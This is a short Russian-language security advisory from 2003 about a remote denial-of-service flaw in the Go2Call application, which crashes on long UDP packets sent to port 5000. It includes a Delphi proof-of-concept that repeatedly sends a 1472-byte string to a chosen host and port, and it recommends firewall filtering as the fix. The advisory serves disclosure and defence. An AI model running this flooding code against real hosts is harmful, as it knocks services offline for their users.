DoS против Go2Call
| Дата публикации: | 05.09.2003 |
| Всего просмотров: | 1405 |
| Опасность: | Низкая |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Отказ в обслуживании |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Go2Call |
Уязвимые версии: Go2Call Описание: Отказ в обслуживании обнаружен в Go2Call. Удаленный пользователь может аварийно завершить работу приложения. Go2Call не в состоянии обработать длинные UDP пакеты. Злонамеренный пользователь может аварийно завершить работу приложения, посылая пакет длиною 1500 байт к 5000 UDP порту. Пример/Эксплоит:
procedure TForm1.Button1Click(Sender: TObject);
var C:string;
N:integer;
MyStream:TMemoryStream;
begin
Memo1.Lines.Add('start');
C:=Edit3.Text; //for example 'AAAA...' 1472 char 'A' for certain
N:=strtoint(Edit4.Text);
NMUDP1.RemoteHost:=Edit1.Text;
NMUDP1.RemotePort:=strtoint(Edit2.Text);
MyStream:=TMemoryStream.Create;
try
MyStream.Write(C[1],Length(C));
for n:=1 to N do
begin
NMUDP1.SendStream(MyStream);
end;
finally
MyStream.Free;
end;
Memo1.Lines.Add('finish');
end;
URL производителя: http://www.go2call.com Решение: Используйте firewall для фильтрации 5000 UDP порта. |
|
| Ссылки: | Go2Call Cash Calling vulnerable |